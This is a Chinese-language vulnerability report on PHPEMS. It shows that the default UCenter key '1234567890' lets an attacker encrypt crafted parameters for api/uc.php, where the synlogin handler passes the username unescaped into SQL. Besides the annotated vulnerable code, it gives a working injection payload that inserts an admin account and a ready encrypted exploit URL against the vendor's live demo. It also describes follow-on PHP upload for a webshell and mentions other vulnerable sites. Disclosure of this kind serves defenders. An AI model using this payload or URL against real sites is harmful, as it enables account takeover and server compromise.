### 简要描述:
phpems 默认uc_key是1234567890
导致可以用uc的加密函数加密恶意代码带到sql语句中。
### 详细说明:
```
if(!defined('IN_UC')) {
error_reporting(0);
set_magic_quotes_runtime(0);
defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
require_once 'config.inc.php';
$_DCACHE = $get = $post = array();
$code = @$_GET['code']; //code=加密代码
parse_str(_authcode($code, 'DECODE', UC_KEY), $get); //到这里进行解密
//var_dump($get);
if(MAGIC_QUOTES_GPC) {
$get = _stripslashes($get); //不明白这里用意,解密后把反斜杠去掉
}
$timestamp = time();
echo $timestamp - $get['time'];
if($timestamp - $get['time'] > 3600) { //time可控
exit('Authracation has expiried');
}
if(empty($get)) {
exit('Invalid Request');
}
$action = $get['action']; //action可控
require_once 'uc_client/lib/xml.class.php';
$post = xml_unserialize(file_get_contents('php://input'));
if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) {
/**
require_once 'include/db_mysql.class.php';
$GLOBALS['db'] = new dbstuff;
$GLOBALS['db']->connect($dbhost, $dbuser, $dbpw, $dbname, $pconnect, true, $dbcharset);
print_r($GLOBALS['db']);
$GLOBALS['tablepre'] = $tablepre;
unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect);
**/
$uc_note = new uc_note();
//file_put_contents('aa.txt','1');
exit($uc_note->$get['action']($get, $post));
} else {
exit(API_RETURN_FAILED);
}
} else {
```
uc_note->synlogin
```
function synlogin($get, $post) {
$uid = $get['uid'];
//$username = iconv('gbk','utf-8',$get['username']);
//gbk版本论坛使用上行
$username = $get['username'];
//UTF8版本使用上行
if(!API_SYNLOGIN) {
return API_RETURN_FORBIDDEN;
}
$sql = "set names utf8";
$this->dblink->query($sql);
$sql = "SELECT * FROM ".DTH."user WHERE username = '{$username}'"; //注入点1
$u = $this->dblink->fetch_first($sql);
$args = array();
if(!$u){ //提交个不存在的用户这里$u就为null
$sql = "SELECT * FROM ".DTH."user_group WHERE groupdefault = '1'";
$g = $this->dblink->fetch_first($sql);
$grouid = $g['groupid'];
$email = $username."@phpems.net";
$pass = md5(rand(1000,9999));
$sql = "INSERT INTO ".DTH."user (`username`,`useremail`,`userpassword`,`usergroupid`,`userregtime`,`userregip`) VALUES ('{$username}','{$email}','{$pass}','{$grouid}','".TIME."','".$this->_getClientIp()."')"; //username可控制,是解密后得到的内容 那么就可以直接添加一个管理员
$this->dblink->query($sql);
$args = array('sessionuserid'=>$this->dblink->insert_id(),'sessionpassword'=>$pass,'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$grouid,'sessionlogintime'=>TIME,'sessionusername'=>$username);
}
else
$args = array('sessionuserid'=>$u['userid'],'sessionpassword'=>$u['userpassword'],'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$u['usergroupid'],'sessionlogintime'=>TIME,'sessionusername'=>$u['username']);
if(!$args['sessiontimelimit'])$args['sessiontimelimit'] = TIME;
if(!$this->sessionid)$this->_getSessionId();
$args['sessionid'] = $this->sessionid;
$args['sessiontimelimit'] = TIME;
$data = array('session',$args);
$sql = $this->_makeReplace($data);
$this->dblink->query($sql);
```
### 漏洞证明:
官方demo来测试:
[<img src="https://images.seebug.org/upload/201502/041512385fe3e1435626bea1dc5b052ce67073b5.png" alt="phpems.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/041512385fe3e1435626bea1dc5b052ce67073b5.png)
现在没有testadmin这个帐号,我们来添加一个
加密这句话然后提交
$str="time=2999999999999999&action=synlogin&username=testadmin','test@test.coom','e10adc3949ba59abbe56e057f20f883e','1','2015-02-04','127.0.0.1')#";
[<img src="https://images.seebug.org/upload/201502/04152040b988a4874fbaabf7481b87e4a0044e9e.png" alt="jm.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04152040b988a4874fbaabf7481b87e4a0044e9e.png)
www.phpems.net/2014/api/uc.php?code=b843/GkLQIWizbadvdy6o9/js/s0OOsDQZq3KhHhyW2nzNTxN6WfQg%2BnwtL3Qbz3YXVpYmC8ibpOgTv9cGHr3TwHHikzy7GtDTEQukPOXPVUzzraPvurp0F78QTp9/ggYXev9PP/iawD/u0lLkhLuf3a2rMZco0l6lbtBQhOC%2BLLKQldXEcjVN0mRV8GrxkEyOBjq0jWVjMuVlzT%2BFNcfqrej0RPozYcWgs0OOsDQZq3KhHhyW2nzNTxN6WfQg
testadmin 密码:123456
前台就可以登陆,然后点击后台管理,都不用找后台
后台编辑器可以直接上传php文件
[<img src="https://images.seebug.org/upload/201502/04151602b10fc9811ef4c9b2e79480c7b15a6ab6.png" alt="phpcms1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04151602b10fc9811ef4c9b2e79480c7b15a6ab6.png)
前人用uc key getshell留下的后门
[<img src="https://images.seebug.org/upload/201502/04151726a3c5159761ef3d2ef903fbb4ff18a062.png" alt="phpems2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04151726a3c5159761ef3d2ef903fbb4ff18a062.png)
其他站点:
[<img src="https://images.seebug.org/upload/201502/04152404981408a2f55d0d38cf1d0a0525d68635.png" alt="qt.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04152404981408a2f55d0d38cf1d0a0525d68635.png)
暂无评论